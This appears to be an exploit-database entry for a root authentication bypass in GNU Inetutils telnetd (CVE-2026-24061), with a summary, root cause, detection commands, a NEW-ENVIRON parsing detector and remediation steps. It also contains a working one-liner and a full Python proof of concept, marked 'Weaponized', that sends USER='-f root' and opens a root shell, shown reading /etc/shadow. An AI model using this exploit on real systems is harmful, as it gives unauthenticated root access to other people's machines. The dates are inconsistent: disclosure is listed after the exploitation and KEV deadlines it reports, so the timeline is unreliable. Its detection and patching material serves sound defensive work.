GNU Inetutils telnetd Unauthenticated Root RCE via NEW-ENVIRON (CVE-2026-24061)

by Ashraf Zaryouh / 0xBlackash · 2026-06-30

CVSS: 9.8/10
Severity: Critical
CVE: CVE-2026-24061
Category: network
Affected product: GNU Inetutils telnetd
Affected versions: 1.9.3 through 2.7; Debian Linux 11.0 ships vulnerable version
Disclosed: 2026-06-30
Patch status: patched

Metadata

Field                  Value
Date Added             2026-06-30
Last Updated           2026-06-30
Author / Researcher    Ashraf Zaryouh / 0xBlackash
CVE / Advisory         CVE-2026-24061
Category               network
Severity               Critical
CVSS Score             9.8 (CVSSv3.1; AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)
Status                 Weaponized
Tags                   RCE, unauthenticated, authentication-bypass, telnetd, GNU-Inetutils, NEW-ENVIRON, legacy, OT, CISA-KEV, active-exploitation, Python
Related                N/A

Affected Target

Field                      Value
Software / System          GNU Inetutils telnetd
Versions Affected          1.9.3 through 2.7; Debian Linux 11.0 ships vulnerable version
Language / Platform        Python (PoC); C / Linux (target daemon)
Authentication Required    No (unauthenticated network attacker)
Network Access Required    Yes (TCP port 23)

Summary

CVE-2026-24061 is a critical authentication bypass in GNU Inetutils telnetd that grants an unauthenticated network attacker an immediate root shell. The NEW-ENVIRON Telnet option handler passes the USER environment variable unsanitised to /bin/login. Setting USER=-f root causes login to treat the session as pre-authenticated root, skipping all password verification. CISA added CVE-2026-24061 to the Known Exploited Vulnerabilities (KEV) catalog in January 2026, with a remediation deadline of 02/16/2026. Mass exploitation against legacy and OT systems was observed shortly after public disclosure. Fixed in GNU Inetutils 2.8 (two patch commits on Codeberg).


Vulnerability Details

Root Cause

When a Telnet client negotiates NEW-ENVIRON, telnetd receives environment variables, including USER, and forwards them to /bin/login via execve. The USER value is placed in login's argument vector without any sanitisation. Because /bin/login accepts -f <user> to skip authentication for already-verified users, supplying -f root as the USER value results in:

execve("/bin/login", ["login", "-f", "root", ...], ...)

Login sees the -f flag, skips password verification, and grants a root shell.

CWE-88 (Improper Neutralization of Argument Delimiters in a Command).

Attack Steps

  1. Connect to telnetd on TCP/23.
  2. During the Telnet option negotiation phase, send NEW-ENVIRON with USER=-f root.
  3. telnetd forwards the value to /bin/login — authentication is skipped.
  4. Attacker receives a root shell prompt.

One-liner

USER="-f root" telnet -a <TARGET_IP>

Impact

  • Immediate unauthenticated root shell over the network.
  • Full system compromise: /etc/shadow readable, persistence trivial.
  • High risk in legacy environments, OT/ICS networks, and embedded systems where telnetd is still running.
  • Active exploitation in the wild confirmed January–February 2026.

Environment / Lab Setup

Target:   Debian 11 / any host running GNU Inetutils telnetd 1.9.3–2.7
Attacker: Python 3 with telnetlib or standard telnet client

Proof of Concept

Python PoC

git clone https://github.com/0xBlackash/CVE-2026-24061
cd CVE-2026-24061
pip install -r requirements.txt   # if any
python3 telnetd.py <TARGET_IP> 23

Expected Output

Trying 192.168.1.100...
Connected to 192.168.1.100.
Escape character is '^]'.

root@legacy-box:~# whoami
root
root@legacy-box:~# id
uid=0(root) gid=0(root) groups=0(root)
root@legacy-box:~# cat /etc/shadow
root:$6$...

Detection & Indicators of Compromise

ss -tnlp | grep :23
netstat -anp | grep telnetd

grep -i "telnetd\|telnet" /var/log/auth.log | grep -i "root"

# Audit every exec of /bin/login (rules are loaded with auditctl, not the auditd daemon)
auditctl -a always,exit -F arch=b64 -S execve -F exe=/bin/login -k telnet_login
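Added example (not part of the original PoC or of the Inetutils code base): a parser for Telnet NEW-ENVIRON subnegotiations (RFC 1572) that runs over a constructed client-to-server capture and flags USER values which /bin/login would read as an option; the same check is what a hardened telnetd would apply before building login's argument vector, as described under Root Cause. The SAFE_LOGIN_NAME policy and the SAMPLE_STREAM bytes are assumptions of this example.

```python
import re
IAC, SB, SE = 0xFF, 0xFA, 0xF0
NEW_ENVIRON = 0x27                         # Telnet option 39 (RFC 1572)
VAR, VALUE, ESC, USERVAR = 0, 1, 2, 3      # NEW-ENVIRON sub-codes
# Conservative login-name policy (assumption of this example, not the upstream fix):
# a POSIX portable user name never begins with '-', so "-f root" can never pass.
SAFE_LOGIN_NAME = re.compile(r"[a-z_][a-z0-9_-]{0,31}")
def _pair(name, value):
    return (bytes(name).decode("latin-1"), bytes(value).decode("latin-1"))

def parse_new_environ(stream: bytes):
    """Return (name, value) pairs from every NEW-ENVIRON IAC SB ... IAC SE block."""
    pairs, pos = [], 0
    while True:
        start = stream.find(bytes([IAC, SB, NEW_ENVIRON]), pos)
        end = stream.find(bytes([IAC, SE]), start + 3) if start >= 0 else -1
        if end < 0:
            break                          # no complete subnegotiation left
        pos = end + 2
        body = stream[start + 4:end]       # skip IAC SB NEW-ENVIRON and the IS/INFO byte
        name, value, target = None, bytearray(), None
        it = iter(body)
        for c in it:
            if c in (VAR, USERVAR):        # a new variable begins
                if name is not None:
                    pairs.append(_pair(name, value))
                name, value, target = bytearray(), bytearray(), "name"
            elif c == VALUE:
                target = "value"
            else:
                if c == ESC:
                    c = next(it, ESC)      # ESC: the following byte is literal data
                if target == "name":
                    name.append(c)
                elif target == "value":
                    value.append(c)
        if name is not None:
            pairs.append(_pair(name, value))
    return pairs

def flag_option_injection(stream: bytes):
    """USER values that /bin/login would parse as an option rather than a user name."""
    return [v for n, v in parse_new_environ(stream)
            if n == "USER" and not SAFE_LOGIN_NAME.fullmatch(v)]

# Constructed sample capture: a benign NEW-ENVIRON IS block, then the PoC's payload.
SAMPLE_STREAM = (
    b"\xff\xfb\x18"                                   # WILL TERMINAL-TYPE (unrelated noise)
    b"\xff\xfa\x27\x00\x00USER\x01alice\x03TERM\x01xterm\xff\xf0"
    b"\xff\xfa\x27\x01\x00USER\x01-f root\xff\xf0"   # the payload from the PoC above
)
```

The same parse-then-validate step placed in front of the execve in telnetd is the shape of the fix; on the wire side it doubles as an IDS rule that never has to see a successful login to fire.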

Immediate mitigation:

systemctl disable --now telnet.socket
systemctl disable --now telnetd

iptables -A INPUT -p tcp --dport 23 -j DROP

Remediation

Action      Detail
Patch       Upgrade GNU Inetutils to 2.8+ (Codeberg commits ccba9f748aa8d50a and fd702c02497b2f39)
Disable     Disable telnetd entirely; replace with SSH
Firewall    Block TCP/23 from untrusted networks at perimeter and host level
CISA KEV    Required remediation deadline was 02/16/2026 — treat any unpatched hosts as compromised

PoC Source: telnetd.py
import telnetlib
import sys
import time

if len(sys.argv) < 2:
    print(f"Usage: python3 {sys.argv[0]} <host> [port=23]")
    sys.exit(1)

host = sys.argv[1]
port = int(sys.argv[2]) if len(sys.argv) > 2 else 23

tn = telnetlib.Telnet(host, port)
print(f"[+] Connected to {host}:{port}")

# Basic Telnet negotiation to reach env var stage
tn.sock.sendall(b"\xff\xfb\x01\xff\xfd\x01\xff\xfb\x03\xff\xfd\x03")  # ECHO + SGA

# Craft NEW-ENVIRON with USER=-f root
# IAC SB NEW-ENVIRON IS VAR USER VALUE -f root IAC SE
payload = (
    b"\xff\xfa\x27"          # IAC SB NEW-ENVIRON
    b"\x01"                  # IS
    b"\x00USER"              # VAR = USER
    b"\x01-f root"           # VALUE = -f root
    b"\xff\xf0"              # IAC SE
)

tn.sock.sendall(payload)
print("[+] Sent malicious USER env var")

time.sleep(1.5)  # Give server time to fork/exec login -f root

print("[+] Interact (press Enter a few times if needed)...")
tn.interact()    # Hands you the shell